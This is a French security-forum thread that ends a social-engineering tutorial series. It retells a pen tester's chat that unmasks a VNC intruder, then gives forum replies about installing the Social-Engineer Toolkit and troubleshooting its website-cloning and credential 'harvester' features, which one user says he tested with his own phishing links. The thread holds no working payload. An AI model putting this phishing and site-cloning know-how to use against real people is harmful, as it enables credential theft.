        Leçon 4: Les criminels jouent souvent sur les sentiments de l'employé et le désir d'être utile.




        Le pirate Piraté.
        Hadnagy donne un troisième exemple montrant comment l'ingénierie sociale a été utilisée à des fins défensives cette fois-ci.

        Le profile 'John, un testeur de pénétration embauché pour effectuer un Pen Test réseau standard pour un client.'

        Il a lancé un scan en utilisant Metasploit, qui a révélé un serveur ouvert VNC (Virtual Network Computing), un serveur qui permet de contrôler les autres machines sur le réseau.

        Il a été se documenter sur la découverte de cette session VNC ouverte lorsque, tout à coup, dans le fond, une souris a commencé à se déplacer à travers l'écran. John était nouveau, mais à cette heure de la journée, aucun utilisateur n'était relié au réseau pour une raison légitime. Il soupçonnait qu'un intrus s'était introduit sur le réseau.

        Prenant sa chance, John a ouvert Bloc-notes et a commencé à bavarder avec l'intrus, se présentant comme un hacker 'n00b', quelqu'un qui est nouveau et non qualifié.
        "Il pensait "Comment puis-je obtenir plus d'informations à partir de ce gars et être plus utile à mon client? ", a déclaré Hadnagy.

        "John a joué sur l'ego du pirate en essayant de prétendre qu'il était un débutant et qu'il voulait en savoir plus à partir d'un grand maître pirate."
        John a alors demandé aux pirates plusieurs questions tout en faisant semblant d'être une personne plus jeune qui voulait apprendre quelques trucs du métier de piratage et qui voulait garder le contact avec un pirate aussi brillant.

        Au moment où le chat était terminé, il avait le courriel de l'intrus, ses coordonnées et même une photo de lui.

        Il a rapporté l'information à son client et le problème de l'accès facile au système a également été fixé.

        Hadnagy souligne que John a appris par sa conversation avec le pirate que le pirate n'avait pas vraiment «ciblé» l'entreprise qu'il avait piratée.

        En fait, il était simplement à la recherche autour de quelque chose de facile à hacker/compromettre et a constaté en cherchant à l'aide de "Dorks" que ce système était ouvert.

        Leçon 5: L'ingénierie sociale peut faire partie de la stratégie de défense de l'organisation. Elle est donc bénéfique et doit être reconnus.

        Leçon 6: Les criminels sont souvent facile à duper, car prétentieux. Tout le monde peut être une cible si la sécurité est faible.


        Voilà j'espère que ces histoires vous auront plu.


        Elles sont directement traduites du livre malheureusement payant SE sur http://www.social-engineer.org.


        Merci à bientôt.
        Dernière modification par DreAmuS, 14 août 2015, 13h07.

        Commentaire


        • #5
          Merci pour le bonus

          Commentaire


          • #6
            Si cela vous a plus je partagerais quand j'aurais le temps 2 petit truc. Un que je fait pour mon blog sur un script que j'ai fork d'un ancien ancien script que je vais détailler de bout en bout et qui travaille sur un module interressant (en python bien entendu, je ne connais que 4 langages assez bien donc je passe pour le reste) et un autre que je ferais explicitement pour ici sur les réseaux sociaux et les nouvelles approches et manière de communication SE. C'est une approche diffèrente faisant partie d'une Team mentaliste depuis de nombreuses années qui comprend des personnes du spectacle, des amateurs, des magiciens et des malfaiteurs du web, j'ai ainsi pu voir les média d'un oeil nouveau et ainsi me prémunir.

            Je bosse aussi sur le détails d'un script PHP bout à bout mais pareil cela prend du temps et j'en ai peu ^^

            A bientôt

            Commentaire


            • #7
              Bonjour,

              j'ai un petit soucis.. d'ailleurs je tiens a préciser que s'est un très bon sujet de A à Z super bien expliqué.
              Donc, j'ai un petit soucis car "harvester" quand je l'ouvre et bien il n'y à absolument rien dedans, j'ai fait des testes avec les liens de phishing que j'ai réalisé et y'a rien dedans ..

              merci.

              Cordialement.

              Commentaire


              • #8
                Bonjour,
                Le tuto est excellent !! Cela faisait longtemps que je cherchais un site web dédié à la sécurité informatique !
                Merci à toi pour le tuto et le BONUS .

                Commentaire


                • #9
                  Merci,
                  D'autres tutoriels sont en cours sur Metasploit et la suite sur Kali est sur le forum.

                  Commentaire


                  • #10
                    Salut Termonde merci pour ce tutoriel DreAmus très bien fait !! Tu ma éclairci beaucoup de chose que j'ai mis des mois à essayer de comprendre via site anglais ou Mauvais forum sur le net..
                    Merci.
                    Dernière modification par Unixell, 31 décembre 2016, 11h00.

                    Commentaire


                    • #11
                      Bonjour DreAmuS,

                      Merci pour le temps que tu as consacré pour nous.
                      Je dois dire que l'expliquation est clair et précise, mais que la réalisation à ceux-ci en est tout autre.

                      Premièrement pour l'installation de setoolkit, pour ma part ( en avril 2017 ^^) setoolkit n'était pas installé par defaut sur kali ( que j'ai bien upgrader et mit à jour ).
                      J'ai ete sur le site de trustedsec pour voir comment l'installer ( au cas ou certainne personne serait dans le même cas ) :

                      ### Telecharger setoolkit : git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
                      ### Installer setoolkit : Aller dans le dossier /set et taper la commande : ./setup.py

                      Une fois celui-ci installé j'ai continuer à lire le tuto, ou nous arrivons au clonage de site web.
                      Une nouvelle barrière se met devant mon chemin ....

                      http://prnt.sc/f0jv3l Le message d'erreur est donc : Python OpenSSL wasn't detected or PEM file not found, note that SSL compatibility will be affected.

                      Et je suis resté bloqué sur cet étape depuis hier ^^
                      Je suis parti un peu partout sur le net sans solution, j'ai terminé sur le github officiel de trustedesec dans la partie isssue : https://github.com/trustedsec/social...ue+is%3Aclosed . Ou je remarque que beaucoup de monde ont ce soucis et que aucune solution n'est trouvé ou ne fonctionne

                      Je vais continuer à essayer de résoudre mes problemes, si quelqu'un à des solutions je suis bien evidemment prenneur.

                      DreAmuS, je ne peut que t'encourager à continuer dans ta lancée et partager ton savoir, tu fait ça comme un chef.

                      Merci à toi et à bientot !

                      Commentaire


                      • #12
                        jupi Salut, je viens de voir qu'il y a une nouvelle version de sortie, peut-être qu'elle corrige ce problème, qui sait ?

                        https://www.kali.org/releases/kali-linux-20171-release/
                        Writer, Cyber Security Enthusiast! Follow me on Twitter: @SwitHak

                        Commentaire


                        • #13
                          L'OMBRE , merci pour l'info.

                          Upgrade fait avec :

                          apt update
                          apt dist-upgrade
                          reboot

                          Mais toujours le même soucis ... ( Python OpenSSL wasn't detected or PEM file not found, note that SSL compatibility will be affected. )
                          Quand je check leur github je vois que je suis pas le seul concerné et qui y'a pas encore de solution.
                          Je vais crée un ticket sur le github histoire qu'il se bouge les fesses, je pense pas que ce soit une erreur de ma part ( je peu me tromper ^^ )

                          EDIT : ce serait interessant d'epingler le V1 V2 V3 V4 de DreAmuS , quand on voit leur nombre de vue, les regroupés serait utile.
                          Dernière modification par jupi, 26 avril 2017, 18h31.

                          Commentaire

                          Chargement...
                          X